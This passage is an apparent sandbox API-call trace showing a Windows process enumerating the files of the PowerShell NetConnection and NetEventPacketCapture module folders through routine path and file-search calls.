lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetConnection", nBufferLength=0x105, lpBuffer=0x1b81e100, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetConnection", lpFilePart=0x0) returned 0x40 [0265.058] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e540) returned 1 [0265.058] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetConnection" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\netconnection"), fInfoLevelId=0x0, lpFileInformation=0x1b81e620 | out: lpFileInformation=0x1b81e620*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa4b7931, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa4b7931, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0265.058] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e500) returned 1 [0265.059] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e570) returned 1 [0265.059] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetConnection", nBufferLength=0x105, lpBuffer=0x1b81e060, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetConnection", lpFilePart=0x0) returned 0x40 [0265.059] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetConnection\\", nBufferLength=0x105, lpBuffer=0x1b81e000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetConnection\\", lpFilePart=0x0) returned 0x41 [0265.059] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetConnection\\*", lpFindFileData=0x1b81e210 | out: lpFindFileData=0x1b81e210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa4b7931, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa4b7931, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8db080 [0265.059] FindNextFileW (in: hFindFile=0x1a8db080, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa4b7931, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa4b7931, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0265.059] FindNextFileW (in: hFindFile=0x1a8db080, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf9c8bf1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xf9c8bf1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xf9c8bf1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x16b7, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetConnectionProfile.cdxml", cAlternateFileName="")) returned 1 [0265.059] FindNextFileW (in: hFindFile=0x1a8db080, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf9c8bf1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xf9c8bf1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xf9c8bf1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x52c, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetConnectionProfile.format.ps1xml", cAlternateFileName="")) returned 1 [0265.060] FindNextFileW (in: hFindFile=0x1a8db080, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf9c8bf1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xf9c8bf1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xf9c8bf1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x791, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetConnectionProfile.types.ps1xml", cAlternateFileName="")) returned 1 [0265.060] FindNextFileW (in: hFindFile=0x1a8db080, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf9c8bf1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xf9c8bf1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xf9c8bf1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x26b, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetConnection.psd1", cAlternateFileName="")) returned 1 [0265.060] FindNextFileW (in: hFindFile=0x1a8db080, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf9c8bf1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xf9c8bf1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xf9c8bf1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x26b, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetConnection.psd1", cAlternateFileName="")) returned 0 [0265.060] FindClose (in: hFindFile=0x1a8db080 | out: hFindFile=0x1a8db080) returned 1 [0265.060] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e4c0) returned 1 [0265.060] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e480) returned 1 [0265.060] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetConnection\\NetConnection.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\netconnection\\netconnection.psd1")) returned 0x20 [0265.061] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e510) returned 1 [0265.061] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetEventPacketCapture", nBufferLength=0x105, lpBuffer=0x1b81e000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetEventPacketCapture", lpFilePart=0x0) returned 0x48 [0265.061] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetEventPacketCapture\\", nBufferLength=0x105, lpBuffer=0x1b81dfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetEventPacketCapture\\", lpFilePart=0x0) returned 0x49 [0265.061] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetEventPacketCapture\\*", lpFindFileData=0x1b81e1b0 | out: lpFindFileData=0x1b81e1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa503e3d, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa503e3d, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8dafc0 [0265.061] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa503e3d, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa503e3d, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0265.061] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103c4961, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103c4961, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103c4961, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x129e, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetEventNetworkAdapter.cdxml", cAlternateFileName="")) returned 1 [0265.062] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103eabb8, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103eabb8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103eabb8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x950, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetEventNetworkAdapter.format.ps1xml", cAlternateFileName="")) returned 1 [0265.062] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103c4961, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103c4961, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103c4961, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x25cb, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetEventPacketCaptureProvider.cdxml", cAlternateFileName="")) returned 1 [0265.062] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103c4961, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103c4961, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103c4961, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x150e, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetEventPacketCaptureProvider.format.ps1xml", cAlternateFileName="")) returned 1 [0265.062] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103eabb8, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103eabb8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103eabb8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1c41, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetEventProvider.cdxml", cAlternateFileName="")) returned 1 [0265.062] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103c4961, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103c4961, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103c4961, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xa6e, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetEventProvider.format.ps1xml", cAlternateFileName="")) returned 1 [0265.063] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103eabb8, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103eabb8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103eabb8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1c48, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetEventSession.cdxml", cAlternateFileName="")) returned 1 [0265.063] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103eabb8, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103eabb8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103eabb8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xd17, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetEventSession.format.ps1xml", cAlternateFileName="")) returned 1 [0265.063] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103eabb8, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103eabb8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103eabb8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1034, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetEventVmNetworkAdatper.cdxml", cAlternateFileName="")) returned 1 [0265.063] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103eabb8, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103eabb8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103eabb8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xd10, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetEventVmNetworkAdatper.format.ps1xml", cAlternateFileName="")) returned 1 [0265.063] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103c4961, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103c4961, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103c4961, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1034, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetEventVmSwitch.cdxml", cAlternateFileName="")) returned 1 [0265.064] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103c4961, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103c4961, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103c4961, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x7dc, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetEventVmSwitch.format.ps1xml", cAlternateFileName="")) returned 1 [0265.064] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103c4961, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103c4961, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103c4961, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1a76, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetEventWFPCaptureProvider.cdxml", cAlternateFileName="")) returned 1 [0265.064] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103eabb8, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103eabb8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103eabb8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xfa0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetEventWFPCaptureProvider.format.ps1xml", cAlternateFileName="")) returned 1 [0265.064] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103eabb8, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103eabb8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103eabb8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x875, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetEventPacketCapture.psd1", cAlternateFileName="")) returned 1 [0265.064] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103c4961, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103c4961, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103c4961, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetEventPacketCapture.Types.ps1xml", cAlternateFileName="")) returned 1 [0265.064] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103c4961, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103c4961, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103c4961, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetEventPacketCapture.Types.ps1xml", cAlternateFileName="")) returned 0 [0265.065] FindClose (in: hFindFile=0x1a8dafc0 | out: hFindFile=0x1a8dafc0) returned 1 [0265.065] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e460) returned 1 [0265.065] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e420) returned 1 [0265.065] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e510) returned 1 [0265.065] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetEventPacketCapture", nBufferLength=0x105, lpBuffer=0x1b81e000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetEventPacketCapture", lpFilePart=0x0) returned 0x48 [0265.065] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetEventPacketCapture\\", nBufferLength=0x105, lpBuffer=0x1b81dfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetEventPacketCapture\\", lpFilePart=0x0) returned 0x49 [0265.065] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetEventPacketCapture\\*", lpFindFileData=0x1b81e1b0 | out: lpFindFileData=0x1b81e1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa503e3d, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa503e3d, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8dbb60 [0265.065] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa503e3d, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa503e3d, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0265.066] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103c4961, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103c4961, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103c4961, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x129e, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetEventNetworkAdapter.cdxml", cAlternateFileName="")) returned 1 [0265.066] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103eabb8, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103eabb8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103eabb8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x950, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetEventNetworkAdapter.format.ps1xml", cAlternateFileName="")) returned 1 [0265.066] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103c4961, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103c4961, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103c4961, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x25cb, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetEventPacketCaptureProvider.cdxml", cAlternateFileName="")) returned 1 [0265.066] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103c4961, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103c4961, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103c4961, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x150e, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetEventPacketCaptureProvider.format.ps1xml", cAlternateFileName="")) returned 1 [0265.066] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103eabb8, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103eabb8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103eabb8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1c41, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetEventProvider.cdxml", cAlternateFileName="")) returned 1 [0265.066] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103c4961, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103c4961, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103c4961, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xa6e, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetEventProvider.format.ps1xml", cAlternateFileName="")) returned 1 [0265.066] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103eabb8, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103eabb8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103eabb8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1c48, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetEventSession.cdxml", cAlternateFileName="")) returned 1 [0265.067] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103eabb8, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103eabb8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103eabb8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xd17, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetEventSession.format.ps1xml", cAlternateFileName="")) returned 1 [0265.067] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103eabb8, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103eabb8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103eabb8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1034, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetEventVmNetworkAdatper.cdxml", cAlternateFileName="")) returned 1 [0265.067] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103eabb8, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103eabb8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103eabb8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xd10, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetEventVmNetworkAdatper.format.ps1xml", cAlternateFileName="")) returned 1 [0265.067] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103c4961, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103c4961, ftLastAccessTime.dwHighDateTime=0x1d112e3, 